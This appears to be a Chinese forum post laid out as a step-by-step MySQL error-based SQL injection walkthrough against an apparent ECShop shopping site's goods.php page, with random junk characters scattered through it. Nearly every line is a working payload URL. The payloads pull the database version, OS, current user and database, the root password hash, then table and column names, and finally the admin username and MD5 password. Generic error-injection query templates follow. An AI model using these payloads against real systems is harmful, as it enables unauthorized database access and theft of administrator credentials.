判断版本号
% N5 t( C2 R& H7 L Ahttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
% R# R4 H* x% `/ v4 ]' Z0 \7 N8 X$ r) N2 M! r
判断系统% ? i. c1 g' ]2 n' n
* e- d' @3 W5 V/ @- h# dhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
% R7 z1 w" k6 K/ s2 g% O* f! O( S: J. B7 a
7 `# J6 x* w# ^+ \/ l
5 k( K b$ g) U" g6 ^+ n- c当前 user()+ c, D0 m3 l% ~2 h; n S: N
, h* L3 E' q! _! U0 _% {- c
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%234 S. H6 q5 q; L0 r/ v \- J" E, M) a
' l4 p, ]4 c5 g$ }' u9 ]! a/ q" k) e9 G# J
' i: x U: \# ^2 d& ?
当前 database()- Q5 X' q# y. N) m W
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23; C- b8 g+ n' `
2 I {4 I6 K! p5 u, ^! o6 O
: L5 d+ W- n( W3 I# p K( u1 F- l( e. i" J/ I
$ b! J" Z h2 R' j8 `' _
root hash | k$ T( |. g \
7 G* M, }2 _% E4 \2 m
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
- {3 [- c z7 ?: o) O+ g
+ w5 b- ^8 g8 R3 R" f9 }. G$ R9 q' L N( v8 N! O$ x/ K
* Y. H8 O& z8 ^5 z4 l; F) A0 [2 _& m
当前 数据库表名
( Z, a+ B! b% O! S: x' W* a$ M* s9 C5 D% A* K
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
. f u; e3 v5 _2 A( D, d; u' Z' j: N8 n$ W! p# Z% Y
$ P; ~8 A8 E9 c
- t; _% C" S2 L D当前 数据库 user_name 字段8 U* W \' Z7 O/ Y
' N2 v1 h1 P# N& Whttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
+ d( K m9 v) D0 Q) D b- w! c+ U2 q* a, V
当前 数据库 字段 password
+ `, A: n* p; k7 Q2 [* f( B6 ?http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
. X) h+ @0 c# ]7 @- U1 R/ U# |: Z0 t! m' B
- t: N8 B' W+ p# \$ a- s# M. t! B* W& d
获得 admin passwd(md5)! S# v& ^, [/ W4 I+ v
4 _2 v2 L9 K' Q. r0 J! @0 \$ M: m. H) V4 X* a. `6 T, F1 X8 O$ Q
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23' H, y& p: i0 R% s- B
& M& B5 M5 D2 u' \& ^
报错注射2 z5 _- O+ X. p' N. [! A7 g
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
# \1 a; }) b) C/ n, B5 J; @4 Q2 n
# n- }7 Z$ Z$ V8 r5 xSELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a): Q/ W0 Y* c# p+ B6 ^" ]
7 t/ B" l! S- @3 v [' Land(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) |